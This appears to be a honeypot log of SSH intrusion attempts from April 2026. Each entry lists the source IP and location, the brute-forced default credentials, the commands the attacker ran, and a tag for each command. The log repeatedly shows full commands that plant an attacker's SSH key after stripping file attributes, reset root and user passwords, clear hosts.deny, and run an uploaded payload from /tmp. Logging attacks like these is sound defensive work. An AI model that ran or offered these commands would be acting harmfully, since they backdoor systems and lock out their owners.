$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 dragon_root_9 (39.106.136.15) — Beijing, China · 2 sessions · 2 cmds

2026-04-20 19:00 EDT · as mysql/mysql, user/user

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 autobahn_root_11 (162.19.252.77) — Limburg an der Lahn, Germany · 1 session · 2 cmds

2026-04-22 05:11 EDT · as oracle/oracle31!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_root_36 (138.59.179.138) — San Pedro Sula, Honduras · 1 session · 2 cmds

2026-04-22 05:05 EDT · as oracle/oracle31!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 monsoon_root_4 (205.254.166.4) — Bengaluru, India · 1 session · 2 cmds

2026-04-22 05:03 EDT · as oracle/oracle31!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 stein_root_2 (46.225.115.147) — Nuremberg, Germany · 32 sessions · 32 cmds

2026-04-22 02:43 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×32

🎭 tiger_root_4 (139.59.43.28) — Bengaluru, India · 1 session · 1 cmd

2026-04-22 04:01 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 liberty_root (165.227.98.222) — Clifton, United States · 35 sessions · 35 cmds

2026-04-22 02:26 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 ghost_root_45 (88.119.179.76) — Vilnius, Lithuania · 1 session · 2 cmds

2026-04-22 01:32 EDT · as oracle/Oracle29!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cipher_root_25 (220.247.224.226) — Meegoda, Sri Lanka · 1 session · 2 cmds

2026-04-22 01:29 EDT · as oracle/Oracle29!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_17 (83.235.16.111) — Athens, Greece · 1 session · 2 cmds

2026-04-22 00:59 EDT · as oracle/Oracle29!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wraith_root_34 (165.22.248.156) — Singapore, Singapore · 1 session · 2 cmds

2026-04-22 00:48 EDT · as oracle/Oracle29!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 burger_root_4 (40.78.155.180) — Des Moines, United States · 1 session · 2 cmds

2026-04-22 00:43 EDT · as oracle/Oracle29!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 yankee_sol_4 (209.141.41.212) — Las Vegas, United States · 2 sessions · 21 cmds

2026-04-18 05:17 EDT · as oracle/Oracle24!, root/admin123

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:t2V9vs7gfRgs"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 lantern_root_7 (219.152.170.58) — Chongqing, China · 1 session · 20 cmds

2026-04-21 22:17 EDT · as oracle/Oracle24!

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "Oracle24!\n3PFqW7dGEBzp\n3PFqW7dGEBzp"|passwd|bash

$ Enter new UNIX password:

$ echo "Oracle24!\n3PFqW7dGEBzp\n3PFqW7dGEBzp\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 wok_root_10 (117.68.49.81) — Hefei, China · 2 sessions · 2 cmds

2026-04-13 11:00 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m ×2

🎭 chateau_root_2 (62.138.26.131) — Strasbourg, France · 1 session · 1 cmd

2026-04-21 20:47 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 dutch_root_2 (176.65.139.111) — Eygelshoven, The Netherlands · 34 sessions · 34 cmds

2026-04-09 00:23 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×34

🎭 wok_root_11 (124.236.76.72) — Hangzhou, China · 1 session · 1 cmd

2026-04-21 19:04 EDT · as ubuntu/password

file attribute tampering

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

🎭 lantern_root_8 (116.55.245.26) — Kunming, China · 1 session · 20 cmds

2026-04-21 19:03 EDT · as ubuntu/password

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "password\npw49pC12IYVI\npw49pC12IYVI"|passwd|bash

$ Enter new UNIX password:

$ echo "password\npw49pC12IYVI\npw49pC12IYVI\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 ghost_root_46 (123.20.172.215) — Ho Chi Minh City, Vietnam · 1 session · 20 cmds

2026-04-21 18:59 EDT · as mysql/mysql

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" → echo "mysql\ncNrFSc4EO

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "mysql\ncNrFSc4EO3hm\ncNrFSc4EO3hm"|passwd|bash

$ Enter new UNIX password:

$ echo "mysql\ncNrFSc4EO3hm\ncNrFSc4EO3hm\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 cosmo_root (45.195.221.26) — Moscow, Russia · 1 session · 20 cmds

2026-04-21 18:34 EDT · as mysql/mysql

cd ~; chattr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa..." → cat /proc/cpuinfo | grep name | wc -l → echo "mysql\nOdqMfD9l7HCW\nOdqMfD9l7HCW"|passwd|bash → Enter new UNIX password: → echo

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "mysql\nOdqMfD9l7HCW\nOdqMfD9l7HCW"|passwd|bash

$ Enter new UNIX password:

$ echo "mysql\nOdqMfD9l7HCW\nOdqMfD9l7HCW\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 phantom_root_6 (210.79.191.199) — Cicurug, Indonesia · 1 session · 20 cmds

2026-04-21 18:24 EDT · as mysql/mysql

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "mysql\n85dZxa43rIFh\n85dZxa43rIFh"|passwd|bash

$ Enter new UNIX password:

$ echo "mysql\n85dZxa43rIFh\n85dZxa43rIFh\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 kimchi_pi (121.131.218.157) — Seoul, South Korea · 4 sessions · 6 cmds

2026-04-19 01:39 EDT · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x tDUrFR3M && bash -c ./tDUrFR3M ×2

↳ make executable

$ ./tDUrFR3M ×2

↳ execute payload

$ scp -t /tmp/tDUrFR3M ×2

↳ execute from /tmp

🎭 ghost_root_5 (103.191.17.214) — Jakarta Pusat, Indonesia · 35 sessions · 35 cmds

2026-04-21 16:43 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 specter_root_37 (83.235.21.125) — Athens, Greece · 1 session · 20 cmds

2026-04-21 17:33 EDT · as mysql/mysql

chattr -ia .ssh → rm -rf .ssh → mkdir .ssh → echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" → passwd mysql:3dYH5nndOcgX → cat /proc/cpuinfo | grep name |

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "mysql\n3dYH5nndOcgX\n3dYH5nndOcgX"|passwd|bash

$ Enter new UNIX password:

$ echo "mysql\n3dYH5nndOcgX\n3dYH5nndOcgX\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 silk_root_8 (112.6.227.209) — Weifang, China · 1 session · 2 cmds

2026-04-21 17:13 EDT · as oracle/Oracle123!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_root_47 (89.152.179.132) — Santa Cruz do Bispo, Portugal · 1 session · 2 cmds

2026-04-21 16:39 EDT · as oracle/Oracle@123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 liberty_root_3 (198.98.56.227) — New York, United States · 2 sessions · 4 cmds

2026-04-09 14:49 EDT · as oracle/Oracle02, oracle/Oracle20

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

